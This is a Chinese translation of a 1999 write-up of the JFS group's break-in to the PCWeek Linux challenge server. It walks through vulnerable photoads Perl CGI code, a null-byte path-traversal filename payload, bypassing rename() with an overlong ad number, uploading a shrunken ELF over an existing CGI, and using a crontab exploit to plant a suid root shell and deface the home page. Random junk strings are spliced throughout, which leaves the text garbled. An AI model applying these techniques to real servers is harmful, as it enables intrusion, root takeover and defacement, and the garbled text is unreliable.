JFS侵入PCWEEK-LINUX主机的详细过程

译者注：PCWeek-Linux 主机是著名电脑杂志 PCWeek 为了测试 WEB 服务器 IIS（NT平台）
和 Apache（Linux平台）的安全性，提供给黑客/骇客攻击的两台主机之一。另一台主机安装
的是 IIS（NT平台）。详细情况请访问网站：http://www.hackpcweek.com/。

0 ~' ^: U6 b5 k8 O
  l5 \+ H: l+ {首先要进行的当然是——收集远端主机信息：打开的端口和提供的网络服务等。经过扫
描后发现大多数端口都被过滤掉了，原因可能是安装了防火墙或设置了 TCP-Wrapper 。所
) r& ^) i2 ?$ r以我们只能从 HTTP 服务器着手了。

lemming:~# telnet securelinux.hackpcweek.com 80
! \5 u) k" c! ~4 ATrying 208.184.64.170...
Connected to securelinux.hackpcweek.com.
Escape character is '^]'.
* N% B0 ~+ s6 T6 X/ v! yPOST X HTTP/1.0
! \! n% Y8 R. g( M0 N; t
( j& N- b  z( r4 n$ S9 r2 FHTTP/1.1 400 Bad Request
& h- H) X& r! U6 t+ ~Date: Fri, 24 Sep 1999 23:42:15 GMT
Server: Apache/1.3.6 (Unix) (Red Hat/Linux)
(...)
  F0 K( C/ X. VConnection closed by foreign host.
lemming:~#
' I! [" ]2 U" \% a. N# T9 z
嗯，服务器操作系统是 Red Hat，WEB服务器是 Apache/1.3.6。从网页上可知服务器安
0 i7 l4 a1 b& l: E* v% V! Q6 c装了 mod_perl，但只有一个 fingerprint 功能，对我们没有什么用处。
Apache 1.3.6 本身没有包含任何可供远端用户使用的CGI程序，但我们不清楚Red Hat
的发行版本中是否有，所以我们进行了一些测试（test-cgi, wwwboard, count.cgi等）。
结果令人失望。于是我们尝试找出网站的结构。经过对该网站HTML页的分析，终于找出
* A" i: r/ s/ A2 T了网站DocumentRoot下的目录结构：
& l" t3 U/ ?  g, D2 }: a
! `; \% M) p1 q) z, A* ~1 F/ A/
/cgi-bin
/photoads/
. Q& G! J# s% A7 n/photoads/cgi-bin

+ H" n. ^0 L6 U% K很自然地，我们的眼光落在 photoads 这个安装模块上。该商用CGI包可在"http://
6 ?# J/ d+ Q) n5 U- x0 f/ owww.hoffoce.com"找到，价格为$149，包括供检查和修改用的PERL源代码。
* g; N. z& Z$ y# c9 J我们找到一个朋友，了解和掌握 photoads 在 Linux 平台上的安装情况，从而大致清楚
: Z! I' S) Q& z& _  n! h# B, Z- Q0 r运行在该主机上的 photoads。
- Z) \8 u( B: w# W& N$ j* R检查了缺省安装的文件后，我们发现可以取得所有用户名及其口令的数据库（http://
7 O' @! u# P2 \" P. u9 a" z$ Osecurelinux.hackpcweek.com/photoads/ads_data.pl），但当我们试图访问配置文件
/photoads/cgi-bin/photo_cfg.pl 时，服务器的设置拒绝了这个请求。
通过 /photoads/cgi-bin/env.cgi，我们可以知道该服务器的许多详细情况，如
- s/ x, r' S; ~/ q* N' }+ S2 x+ CDocumentRoot 在文件系统的位置（/home/httpd/html），运行 Apache 服务器的用户（
' Z  w8 W/ P4 i1 a$ N( y& M+ Enobody）等。
/ e' c. e/ d; i; X# y现在，开始寻找漏洞的第一步，我们尝试寻找是否存在 SSI 或 mod_perl 嵌入 HTML
. U6 W" v  e+ Q; G# |# _5 {命令的漏洞，如：
3 I( S2 j& t: b
<!--#include file="..."--> for SSI
<!--#perl ...--> for mod_perl
. L" q1 M# y! ]; q1 v
但脚本中的匹配表达式却在许多输入域上过滤此类输入。不过与此同时我们却发现有一
  j- ?- s* _4 G8 X个用户赋值的变量在转换成 HTML 代码前，并没有检查其值的合法性。我们可以通过它将命
; s- q/ E  W) w; ]* |令嵌入到由服务器端解析的 HTML 代码中：
; A2 ~( ]9 Z' l) A' {3 F0 `
在 post.cgi，行 36：
print "you are trying to post an AD from another URL:<b> $ENV{'HTTP_REFERER'}\n";
& e8 s1 ~" k7 x  }
$ENV{'HTTP_REFERER'}是一个用户赋值的变量，我们可以通过它将任何 HTML 嵌入到代
' X% D7 V' r* `/ S码中。
请阅读我们提供的文件 getit.ssi 和 getit.mod_perl。
. O- m1 Q6 u6 [; b8 u  n在命令行下使用这些文件如下：
5 w% N! S6 f; U: T1 |
2 [, s* u# g$ o: G' ^1 Ulemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80

但不幸的是，该主机的配置并不允许 SSI 或 mod_perl，所以我们无法利用这个方法侵
入系统。

因此我们决定在CGI脚本中寻找缺口。在PERL脚本中许多漏洞往往出现在 open()、
system() 或 `` 等调用中，前一个允许读/写/执行，而后两个允许执行。
虽然在该主机找不到后两种调用，但我们却发现了一些 open() 调用：

1 j3 e4 v/ z, Y; Hlemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more
  E* s8 [2 ?& `! ^7 h
advisory.cgi: open (DATA, "$BaseDir/$DataFile");
edit.cgi: open (DATA, ">$BaseDir/$DataFile");
edit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!\n";
photo.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
photo.cgi: open ( FILE, $filename );
(...)
- r7 F& E1 S( N
/ a7 T2 c7 ?! u! ?0 z8 y& k* G$BaseDir 和 $DataFile 两个变量是在配置文件中定义，且不能在运行时修改，无法被
$ C4 z. f" ?: x9 l$ O! B我们利用。
' Q% g% `8 P' p& I5 z0 n5 R6 q但其余两个就……
- y7 q" E, H) {1 M! R4 x* ?; r
$ A  G0 E7 S7 W在 photo.cgi，行 132：
# w7 L* q4 W$ W: @, Q! a$write_file = $Upload_Dir.$filename;

open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
print ULFD $UPLOAD{'FILE_CONTENT'};
close(ULFD);
1 a1 x' g# n. y9 S! _. @8 y
因此，如果我们可以修改 $write_file 变量，就可以写文件系统中的任何文件。
5 S$ F5 k$ Q- ]3 U! Z  @$write_file 变量来自：
5 |* C( k1 f0 `0 z% T# q! D
( U; z+ u/ b1 Y6 z7 D* K) R, m$write_file = $Upload_Dir.$filename;
- ]/ r3 k- f  T& O+ g, X
其中，$Upload_Dir 在配置文件中定义，我们无法修改，但 $filename 变量又如何呢？
, k- r8 [8 [6 w  V7 [7 j
在 photo.cgi，行 226：
; W& Q( w2 R; ^2 e: b- F. R9 Yif( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); }

$filename = lc($UPLOAD{'FILE_NAME'});
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
! ~$ ~$ S- S$ I; p  f
: p6 P6 G2 l& zif ($filename =~ m/gif/) {
0 t/ Y! H7 T" t% q  ?' g$type = '.gif';
" C: P  d% G3 ]% Y7 P! ~7 u0 @}elsif ($filename =~ m/jpg/) {
7 a, X  v, j, z1 m! n' f$type = '.jpg';
}else{
8 F; Q1 B7 ^$ t8 N% W7 V( r( {{&Not_Valid_Image}
9 b& V, Q: E/ J- L) ^6 E}

由此可知，该变量来自从提交表格的变量组分解出来的 $UPLOAD{'FILE_NAME'}，而且必
1 D5 p4 K1 j# y须经过匹配表达式过滤，因此我们不能用"../../../../../../../../etc/passwd"格式来取
; X+ g4 L$ l; X5 n得任何文件。匹配表达式为：
* G% w: _0 J+ F. r  a7 W! C
. }: D4 t6 E, ?+ K% F, D) r$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;

$ V! a1 e6 Y2 {我们看到，如 $filename 与该表达式匹配，则返回ASCII码1（SOH）。同时，变量还必
% G7 z) N$ s# F$ u, ?须包含"gif"或"jpg"，以通过 Not_Valid_Image 过滤器。
  P* ?5 A4 s* O9 V( _$ S经过多次尝试，以及从 Phrack 的关于PERL CGI安全性文章的帮助，我们发现以下格式

/jfs/\../../../../../../../export/www/htdocs/index.html%00.gif
- j! X8 Y# V3 W; {9 R3 H: D7 u5 B
可以成功修改WEB服务器根目录下的index.html文件。:-)
0 _/ p+ K' i% n6 ?然而，为了上载文件，我们仍须绕过更多的脚本代码。我们发现无法通过POST方法发送
包含上述内容的表格（无法转换%00），唯一的方法只能是GET。
在 photo.cgi ，行 256，会检查被上载文件的内容是否符合图像定义（宽/长/大小）
（记住，photo.cgi 是被当作某个AD上载图像的一个方法）。如果不符合这些细节，脚本将
" n! ^% x2 i3 V9 O6 ~删除该上载文件。这当然不是我们所希望的！
PCWeek 网站配置文件将 Imagesize 设为 0，所以我们可以忽略该脚本中有关JPG部分，
而将主要精力集中在GIF上。

+ }: Y6 a1 {: U2 @9 xif ( substr ( $filename, -4, 4 ) eq ".gif" ) {
3 P: \0 l3 d+ Eopen ( FILE, $filename );
my $head;
- E. m: s, p; i. umy $gHeadFmt = "A6vvb8CC";
my $pictDescFmt = "vvvvb8";
read FILE, $head, 13;
(my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head;
2 c1 v" v; }# Z/ Hclose FILE;
( D: q* ^$ p: Y, m$PhotoWidth = $width;
$PhotoHeight = $height;
3 k1 J; o9 o- M8 ~( F$PhotoSize = $size;
0 @7 B8 I  B4 f) Preturn;
0 W+ M3 }& |2 c- [' B}
: g) U9 R+ ]& I. X& j1 S3 P+ v1 g$ a
在 photo.cgi，行 140：
# S/ L% _; @$ c, \/ \& z0 D
if (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
$ X9 u* J9 V; }{&Not_Valid_Image}
}
2 ^& I: D* u6 c0 k% |
3 l8 D" X4 e9 v% B3 `5 M8 [( R' dif ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
{&Height_Width}
}

由上可知，$PhotoWidth不能大于700，不能为空，且不能大于 $ImgWidth（缺省为350）
; f% M' o& \/ W8 A$ r; F。
4 H' U& S8 V# C# d2 x7 S2 [: K所以我们使 $PhotoWidth!="" 且 $Photowidth<350 即可。
. B" }% e7 p- j对于 $PhotoHeight，则必须小于 $ImgHeight（缺省为250）。
综合以上要求，我们可以得到一个可以使用的数据：$PhotoWidth==$PhotoHeight==0。
研究提取该值的脚本后，我们唯一要做的就是将文件的第6至第9字节的值置为 ASCII 码 0
（NUL）。
$ t) ]' v4 V9 L) Q9 e/ M% z1 X在确保 FILE_CONTENT（文件内容）符合以上所有要求后，我们又在以下代码遇到了另一
% p% Y5 j# ^9 z9 q9 \- y个问题：
4 k& J" L# e  |1 \. c
chmod 0755, $Upload_Dir.$filename;
$newname = $AdNum;
rename("$write_file", "$Upload_Dir/$newname");
* B% D2 x9 b( a6 H2 K1 `
6 Z- u$ j/ h3 z9 x( fShow_Upload_Success($write_file);

哇！文件将被改名/移动（这可是我们绝对不希望的！）。
& H& G) Q1 H( ]. z查找 $AdNum 变量的最终处理过程，我们发现它只能包含数字：
$ H- G2 d( [' Z( a  N3 _. S
$UPLOAD{'AdNum'} =~ tr/0-9//cd;
+ |& k) H$ E  o  s$UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+&#%$@*//cd;
$AdNum = $UPLOAD{'AdNum'};

" \) `! S% @2 z0 \4 h其余的字符将被删除。因此我们不能直接应用"../../../"这种方法。
! e- x( B9 U) I  w那么，应该怎样做呢？我们看到 rename() 函数需要两个参数：旧的路径和新的路径。
哈哈，在函数过程中没有错误检查！当函数出错后将跳到下一行继续执行！那么如何才能使
该函数失败呢？Linux 内核对文件名长度限制为1024字节。因此如能使脚本将文件改名时新
文件名超过1024字节长，即可绕过这个过滤器。
( _8 t  L# J8 J, ]+ f所以，下一步就是要向系统传递一个大约1024字节长的AD号码。但由于脚本仅允许我们
( S% {: h5 Y, X' j发送对应AD号码已存在的图片，而且由系统产生一个10^1024（10的1024次幂，即小数点前有
% I9 I' l; N! F, h- u( n! p! O1 Q1024个数字——backend注）的AD号码要花的时间对我们来说似乎太长了。;-)
& U3 g- y" P! q6 g" k我们又遇到另一个难题了！……
( i2 u: A/ K5 \. w3 o) {* T- P
$ [' i4 W& ^, s1 [5 H我们发现输入错误检查函数可以帮助我们创建一个指定的AD号码！浏览 edit.cgi 脚本
后，你也许就会想到：如果输入是一个文件名+回车符+一个1024位的数字，会产生什么结果
8 y: h0 D; [0 j呢？;-)
" }! Z7 z9 l3 q) h; x2 d3 q请阅读用于创建新AD值的程序文件 long.adnum。
当成功绕过 $AdNum 的检查后，我们就可以让脚本创建/覆盖用户 nobody 有权写的任何
+ |# y. b1 A) |0 y* A! }3 {! i$ r: A. P文件，其中包含了我们所希望的东西（GIF头部的NUL除外）。

现在就让我们对该主机试一试这个方法。
: a. O  c& _' s8 F1 w- W嗯，so far so good（一切顺利）。但当我们试图让脚本改写 index.html 文件时无法
成功。:( 其中的原因可能是没有覆盖该文件的权限（该文件由root拥有）。


7 u4 n; t& u7 }8 f让我们试一下是否还有其它入侵方法……
" A" s/ u4 O5 b: Z5 C
! C2 `/ q3 \% f/ v2 g( n. L我们决定尝试修改CGI程序，以使其按我们的意愿运行:)。这种方法还可以让我们搜寻那
些“绝密”文件，然后拿出动卖。:)
3 |. {1 \* E) W# W我们修改了“覆盖”脚本，并让其成功地覆盖了一个CGI！:) 为了不覆盖那些较为重要
的CGI（这是提高隐蔽性的聪明法子——backend注），最后我们选择了 advisory.cgi（你知
, D) W& W; J* a# o$ y道它有什么用吗？:)）
5 O9 D7 {7 R. A* z! B0 l现在，我们将要上载一个shell脚本，以便我们可以执行一些命令。呵呵
然而，这个以CGI方式运行的shell脚本必须符合以下格式：

$ n) D( F" @6 R# ?, k#!/bin/sh
echo "Content-type: text/html"
find / "*secret*" -print
0 F: N) w# B& O5 D
同时要记得，第6至第9字节必须为0或很小的值，以符合上面提及的大小定义……

#!/bi\00\00\00\00n/sh

以上这种方法是行不通的，内核只会读取前5个字节（#!/bi）内容并执行。在该主机中
我们无法只用三个字节去获得一个shell。又遇到难题了！:(

让我们看一下ELF（Linux缺省可执行类型）二进制文件格式，就会发现那些位置字节的
内容均为0x00。:) Yohoo :)
解决了这个问题后，现在我们需要将这个ELF可执行文件上载到远端服务器中。注意，文
件内容必须经过编码，因为我们已知道只能通过GET方法上载，而不是POST。因此还要考虑到
- k  ?9 J  J/ e# Z9 w# J. W- i" gURI的最大长度。Apache 服务器上URI最大长度设为8190字节。别忘了，我们还有一个很长的
* n; l& K7 a( ~' N1 r! q' q/ ]0 [1024字节的AD号码，所以经编码后的ELF文件长度限制为大约7000字节。
- @# F: o3 T: Y/ f
' z) a4 t) y7 m, f1 q5 i以下这个程序：

4 E( V- J( O  C2 b( |2 Ilemming:~/pcweek/hack/POST# cat fin.c
#include <stdio.h>
main()
# _0 @2 M' Q! t" [5 m2 B* G6 z{
printf("Content-type: text/html\n\n\r");
fflush(stdout);
1 R% Y" B2 B/ ^5 jexeclp("/usr/bin/find","find","/",0);
  ~' v( _+ i+ ~}
( K# ^" O. q/ ?* A9 n( U
" h0 S! K5 r6 T! z8 j, G. \. i编译后：

lemming:~/pcweek/hack/POST# ls -l fin
. `) p6 m+ A1 h4 m: c0 i4 C( X-rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin*
; e0 W# @( t9 M  a
优化（清除symbols）后：
5 s1 r) K9 h- `0 u& }* P3 F7 G/ A" u, o
lemming:~/pcweek/hack/POST# strip fin
lemming:~/pcweek/hack/POST# ls -l fin
: G8 Y  A8 k+ E, l-rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin*
" R$ |+ a& @% ^9 J0 q" h: w( a4 S7 j. |lemming:~/pcweek/hack/POST#

URL编码后：

lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
3 {6 `/ y5 b' Glemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url

' `" g- a+ }2 ~7 E0 V3 E这个文件大小超过了限制值。:(
% z* z2 G! q5 N: X3 y1 p我们只能自行编辑二进制文件以尽量减小文件体积。这可不是一件轻松的工作，但却有
效：

3 b0 l9 d- ~9 u' e3 f$ Flemming:~/pcweek/hack/POST# joe fin
lemming:~/pcweek/hack/POST# ls -l fin
/ A  J* b  \) f: G5 n8 F7 |3 F6 S-rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin*
2 t) k( a: C; w% c0 L( Zlemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url
) y5 D; j) ~$ N5 W7 a" w& T2 Alemming:~/pcweek/hack/POST#
' |; h8 v8 e* H. t8 E5 L: J
请阅读 get.sec.find文件，还有 to_url 脚本和用来运行一些基本命令的*.c文件。

现在，将这个CGI上载到服务器，再用浏览器访问它，如：

wget http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi
) t5 R* c# k" l8 O- V% f0 l. G
服务器返回的结果相当于在服务器上执行 find / 命令。:)
5 `7 n8 b* i1 {" m: e6 y: i$ Y# _但我们在该服务器中找不到任何“绝密”文件，或许是nobody用户无权访问的缘故。:(
2 {, V) k, p) s1 h) v我们尝试了更多的命令搜索，如ls等，但仍无法找到它们的踪影。
[我怀疑这些文件是否真的保存在该服务器上！]

9 t% f6 q& r2 b2 h& C
好了，现在是获取 root 权限的时候了。利用最新发现的 Red Hat crontab 漏洞就可以
9 L# C4 m7 g) m0 H/ t2 T轻松做到这一点。该漏洞详情请参阅 Bugtraq 或 securityfocus 上相关文档。
' [7 |0 _8 o- Y7 V我们修改了源程序以适应自己的需要，因为我们不需交互式 root shell，而是创建一个
: _5 ~6 D2 Q) N+ P1 V& v9 f  F. |用户 nobody 可访问的 suid root shell，如 /tmp/.bs。我们再次上载该CGI，并运行它，
1 ~- P0 r; v$ L, Q观察其运行结果。
7 j" w& U4 `; B+ f  w& u, A9 _我们制作了执行"ls /tmp"命令的CGI，执行后确认我们已拥有了一个 suid root shell。
另外，我们还上载了一个文件 /tmp/xx，用于修改 index.html 文件。

& q5 Y/ [, [/ }execlp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0);
2 G+ d1 e1 O! S4 {- _
2 w# y- C- x" j, L好了。游戏结束！:)
! ]: b+ ^0 J/ _0 y总共花费了大约20个小时，还算不错！呵呵。:)

# E5 G: F6 s; s: p4 ^' r0 R9 |/ \